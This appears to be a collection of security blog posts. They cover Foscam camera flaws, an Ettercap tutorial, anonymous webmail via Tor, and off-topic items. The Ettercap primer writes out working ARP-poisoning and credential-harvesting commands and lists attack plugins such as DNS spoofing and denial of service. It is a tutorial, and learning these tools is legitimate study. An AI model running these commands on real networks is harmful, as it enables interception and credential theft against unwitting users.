McDonalds Uses Classical Music to Stop Anti-Social Behaviour

Though the technique has been used by Stockport council in the past, this is the first time classical music has been used in this way inside a local business.

After rises in anti-social behaviour in the area around the Grand Central branch of McDonald’s, the restaurant has been piping in the music of Beethoven, Brahms and more to try and pacify the more boisterous late-night customers.

The branch is very close to several clubs and pubs and is a popular destination for revellers after closing time. Councillor Philip Harding commented: “The idea is they would disperse as it’s not their scene. I believed it was successful [in the town centre] but it’s a bit of a different suggestion inside a business.”

He added: “I like classical music but I’m not sure the patrons of McDonald’s do.”

Many Internet Connected Security Cameras are Open to Remote Exploit

Thousands of wireless IP cameras connected to the Internet have serious security weaknesses that allow attackers to hijack them and alter their firmware, according to two researchers from security firm Qualys.

The cameras are sold under the Foscam brand in the U.S., but the same devices can be found in Europe and elsewhere with different branding, said Qualys researchers Sergey Shekyan and Artem Harutyunyan, who analyzed the security of the devices and are scheduled to present their findings at the Hack in the Box security conference in Amsterdam on Thursday.

Tutorials provided by the camera vendor contain instructions on how to make the devices accessible from the Internet by setting up port-forwarding rules in routers. Because of this, many such devices are exposed to the Internet and can be attacked remotely, the researchers said.

Finding the cameras is easy and can be done in several ways. One method involves using the Shodan search engine to search for an HTTP header specific to the Web-based user interfaces of the cameras. Such a query will return more than 100,000 devices, the researchers said.

The vendors selling these cameras also have them configured to use their own dynamic DNS services. For example, Foscam cameras get assigned a hostname of the type [two letters and four digits].myfoscam.org. By scanning the entire *.myfoscam.org name space an attacker could identify most Foscam cameras connected to the Internet, the researchers said.

Around two out of every 10 cameras allow users to log in with the default “admin” user name and no password, the researchers said. For the rest that do have user-configured passwords, there are other ways to break in.

One method is to exploit a recently discovered vulnerability in the camera’s Web interface that allows remote attackers to obtain a snapshot of the device’s memory.

This memory dump will contain the administrator user name and password in clear text along with other sensitive information like Wi-Fi credentials or details about devices on the local network, the researchers said.

Even though the vendor has patched this vulnerability in the latest firmware, 99% of Foscam cameras on the Internet are still running older firmware versions and are vulnerable, they said. There is also a way to exploit this vulnerability even with the latest firmware installed if you have operator-level credentials for the camera.

Another method is to exploit a cross-site request forgery (CSRF) flaw in the interface by tricking the camera administrator to open a specifically crafted link. This can be used to add a secondary administrator account to the camera.

Ettercap Primer

Ettercap is certainly nothing new, and there is plenty of documentation around to see how to use it, but I was sitting here goofing around and decided to record my results. I am not advocating this type of thing on a public network, and ARP poisoning or other attacks often fall afoul of terms of service for public and private networks, and may even be illegal in some jurisdictions.

I’m going to show you a couple ways you can use Ettercap from ARP poisoning to more advance MITM SSL striping attacks.

ARP Poisoning

First you need to check out your default route.

$ route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
10.71.0.0       0.0.0.0         255.255.255.0   U     2      0        0 wlan0
0.0.0.0         10.71.0.1       0.0.0.0         UG    0      0        0 wlan0

To sniff the whole subnet, You’ll want to do some ARP poisoning to send all traffic to/from the default route through my system.

$ sudo ettercap -i wlan0 -T -M arp:remote /10.71.0.1/ //

You can also use “// //” to designate ARP poisoning no matter what source and destination ettercap sees. The “-T” tells ettercap to use the text interface, which is still interactive. There is also a curses-based interface, “-C”, and GTK with “-G” though it has always seemed less reliable to me than the others. The curses interface is actually pretty nice.

Once you run the command, ettercap should enumerate hosts and you will start seeing a bunch of traffic information scrolling through your console. How do we know if it’s actually working? If you see non-broadcast traffic destined for other hosts, it will be obvious and you will know you’re successfully sniffing all the traffic.

Another fun way is by opening etherape to see a realtime visualization of the traffic. If you are seeing typical non-broadcast traffic like HTTP, HTTPS, that’s an indicator that you’re successfully ARP poisoning. You can also get a quick idea if there are particular hosts getting a lot of traffic activity. I’ve seen the typical sites like Facebook, Amazon, Akamai, and LLNW, but also more interesting sites that are easily identifiable as VPN concentrators, banks, and more.

You can also of course use various tools including ettercap with the “-w” option to write traffic to a file and review at my leisure to look for interesting data. Ettercap also has an interesting utility to automatically grab usernames and passwords. From the man page:

-L, --log
Log  all  the packets to binary files. These files can be parsed
by etterlog(8) to extract human readable data. With this option,
all  packets  sniffed  by ettercap will be logged, together with
all the passive info (host info + user & pass) it  can  collect.
Given  a LOGFILE, ettercap will create LOGFILE.ecp (for packets)
and LOGFILE.eci (for the infos).

If you didn’t run this with ettercap originally, you can also run it on a saved packet capture.

$ ettercap -r hotel.raw -L hotel

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Please select an User Interface
$ ls hotel*

hotel.eci  hotel.ecp  hotel.raw $ etterlog -a hotel.eci
etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA Log file version    : NG-0.7.3 Timestamp           : Wed Feb 16 14:20:57 2010 Type                : LOG_INFO Number of hosts (total)       : 248 Number of local hosts         : 30 Number of non local hosts     : 0 Number of gateway             : 0 Number of discovered services : 240 Number of accounts captured   : 4

$ etterlog -p hotel.eci 74.125.93.191   TCP 80     USER: fakeuser      PASS: fakepasswd

I changed the data above and of course most sites these days are hopefully forcing encrypted logins.

These days, many sites can be hosted on one IP or virtual server. If you’re not catching the DNS or HTTP request specifically before the login that was captured, the easiest way to determine which site on a specific IP was being visited would be opening up the packet capture with a tool like Wireshark, using a filter for the IP, then looking at the actual web traffic for the site’s name. Looking in Wireshark, I can see the GET immediately after the TCP handshake.

GET /members/bbs/showthread.php HTTP/1.1
Host: www.fakedomain.com

This really just scratches the surface of what you can do with ettercap and other network tools. ARP poisoning still works, particularly on public networks, and many people log in to many services that can be easily compromised through sniffing (I write while sitting in an airport on public WiFi logged into my blogger account). A relatively recent high profile example was when the Metasploit site was briefly hijacked by successful ARP poisoning.

Man-in-the-Middle SSL Striping
I found some good videos explaining this attack. Seeing as it would be a rather large explanation on paper. Thanks to infosecinstitute for the great tutorials.

Demo of the Attack

Explanation Part 1

Explanation Part 2

Here’s a list I got straight from ettercap of all the plugins ettercap comes with by default.

$ ettercap -P list

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Available plugins :

arp_cop  1.1  Report suspicious ARP activity
autoadd  1.2  Automatically add new victims in the target range
chk_poison  1.1  Check if the poisoning had success
dns_spoof  1.1  Sends spoofed dns replies
dos_attack  1.0  Run a d.o.s. attack against an IP address
dummy  3.0  A plugin template (for developers)
find_conn  1.0  Search connections on a switched LAN
find_ettercap  2.0  Try to find ettercap activity
find_ip  1.0  Search an unused IP address in the subnet
finger  1.6  Fingerprint a remote host
finger_submit  1.0  Submit a fingerprint to ettercap's website
gre_relay  1.0  Tunnel broker for redirected GRE tunnels
gw_discover  1.0  Try to find the LAN gateway
isolate  1.0  Isolate an host from the lan
link_type  1.0  Check the link type (hub/switch)
pptp_chapms1  1.0  PPTP: Forces chapms-v1 from chapms-v2
pptp_clear  1.0  PPTP: Tries to force cleartext tunnel
pptp_pap  1.0  PPTP: Forces PAP authentication
pptp_reneg  1.0  PPTP: Forces tunnel re-negotiation
rand_flood  1.0  Flood the LAN with random MAC addresses
remote_browser  1.2  Sends visited URLs to the browser
reply_arp  1.0  Simple arp responder
repoison_arp  1.0  Repoison after broadcast ARP
scan_poisoner  1.0  Actively search other poisoners
search_promisc  1.2  Search promisc NICs in the LAN
smb_clear  1.0  Tries to force SMB cleartext auth
smb_down  1.0  Tries to force SMB to not use NTLM2 key auth
stp_mangler  1.0  Become root of a switches spanning tree

Ruxcon: Homebrew Defensive Security

Interesting  sideshow from Ruxcon on building your own homebrew security, and implementing good security practices.

Anonymous Email Accounts

A Tutorial on Anonymous Email Accounts

Tomorrow, as the Senate Judiciary Committee considers reforming the decades-old federal email privacy law, the personal Inboxes and love lives of senior military and intelligence figures may be on that august body’s mind.  When the FBI poured through the personal lives of CIA Director David Petraeus, Paula Broadwell, Jill Kelly and General John Allen, citizens across the land began to wonder how the FBI could get that kind of information, both legally and technically.

So, just how do you exchange messages with someone, without leaving discoverable records with your webmail provider? This is an important practical skill, whether you need to use it to keep your love life private, to talk confidentially with a journalist, or because you’re engaged in politics in a country where the authorities use law enforcement and surveillance methods against you.

The current state of anonymous communication tools is not perfect, but there here are some steps that, if followed rigorously, might have protected the Director of the CIA, the Commander, U.S. Forces Afghanistan, and their friends against such effortless intrusion into their private affairs.

Pseudonymous webmail with Tor

According to press reports, Broadwell and Petraeus used pseudonymous webmail accounts to talk to each other. That was a prudent first step, but it was ineffectual once the government examined Google’s logs to find the IP address that Broadwell was using to log into her pseudonymous account, and then checked to see what other, non-pseudonymous, accounts had been used from the same IP address. Under current US law, much of this information receives inadequate protection, and could be obtained from a webmail provider by the FBI without even requiring a warrant.

Because webmail providers like Google choose to keep extremely extensive logs1, protecting your pseudonymous webmail against this kind of de-anonymization attack requires forethought and discipline.

You should use the Tor Browser Bundle when setting up and accessing your webmail account. You must always use Tor. If you mess up just once and log into the pseudonymous account from your real IP address, chances are that your webmail provider will keep linkable records about you forever. You will also need to ensure that you do not give your webmail provider any information that is linked to your real world identity. For instance, if prompted for an email account, do not use another real account during signup; use a throwaway address instead.

Set Up A Webmail Account

Now that you have your Tor Browser up and running, use it to set up a new webmail account, ideally with a provider that you do not otherwise use. Using a separate webmail provider will help you to distinguish between your anonymous account and your regular email account. Hushmail allows users to set up new webmail accounts while using Tor to protect their anonymity, which is why we are using it in this tutorial. Note that Hushmail has a checkered history, but it is the only webmail service we are aware of that allows the use of Tor in this way–something we’d like to see changed.  Google tries to prevent people from signing up for Gmail accounts pseudonymously, and alternatives like Yahoo! Mail are missing HTTPS protection. Without both HTTPS and Tor at the time of creation and use, your account is not truly anonymous.  As an added precaution, you may want to use public wifi at an Internet cafe or a library whenever you connect.

To set up your Hushmail account, go to https://www.hushmail.com/start, shown in the screenshot below, and click the “Try Hushmail” button, which will allow you to set up a free Hushmail account.Try Hushmail

 

Fill in the form shown in the screenshot below. Remember to choose a strong password. You must also check a box acknowledging that Hushmail will cooperate fully with authorities pursuing evidence via valid legal channels. This means that, given a proper court order, Hushmail may give up metadata about your messages–the IP addresses you’ve been logging in from (luckily you use Tor every single time), the times you’ve logged into your webmail, and the email addresses of the people with whom you’ve been corresponding. Hushmail may even give up the contents of your messages to law enforcement, and has in the past as we note above, which is why you want to make sure that your messages never contain any information that may give your identity away if you wish to remain anonymous. If you are concerned about law enforcement obtaining the contents of your emails from Hushmail, you should encrypt your email correspondence using OpenPGP.

Hushmail Create Account

When you send messages via Hushmail, beware the “Ecrypt” checkbox, shown in the screenshot below. This is not end-to-end encryption like PGP. Hushmail will still have access to the plaintext of your email messages. This means that you are not safe from de-anonymization via the clues you type into your pseudonymous emails.

Using End-to-End Encryption With Your Pseudonymous Email Account

Setting up pseudonymous PGP/GPG in Hushmail is an complicated task that lies outside the scope of this tutorial. You are unlikely to do it safely unless you are quite technically sophisticated, and any mistakes could break the pseudonymity of your account. If you do want to attempt to do this, here are some considerations to bear in mind:

  • You will need to make a new key just for your pseudonymous account and the other pseudonymous people you want to talk to will need to do the same
  • You will need to figure out a way to exchange public key fingerprints with them. Your Hushmail accounts are probably good enough for this.
  • You will need to make sure that all of the software you use to handle the key (intentionally or unintentionally) is always Torified
  • If you use PGP normally for non-pseudonymous purposes, you will need to make sure that no PGP software uses or produces evidence of one key in the context of your other identity.

 

Minecraft Installer Script for Xubuntu

I’m sorry it’s not really hacking related but I’ve created a script for installing Minecraft on Xubuntu. It can install both Minecraft and the Minecraft server. Sun Java if you don’t already have it.  As well as debug if you run into any problems. To start Minecraft run

minecraft

and the server with

minecraft_server

Sorry I’m so off topic from pentesting, I just wanted to share what I spent my Sunday afternoon creating. http://dl.dropbox.com/u/26498135/installer.sh

Note: If you are using Xubuntu with this script some people have reported the Minecraft blackscreens at startup. You can fix it with this http://www.minecraftwiki.net/wiki/Tutorials/Update_LWJGL

Another quick note I will be writing a guide on setting up a lab designed for pentesting this week. Stay tuned!!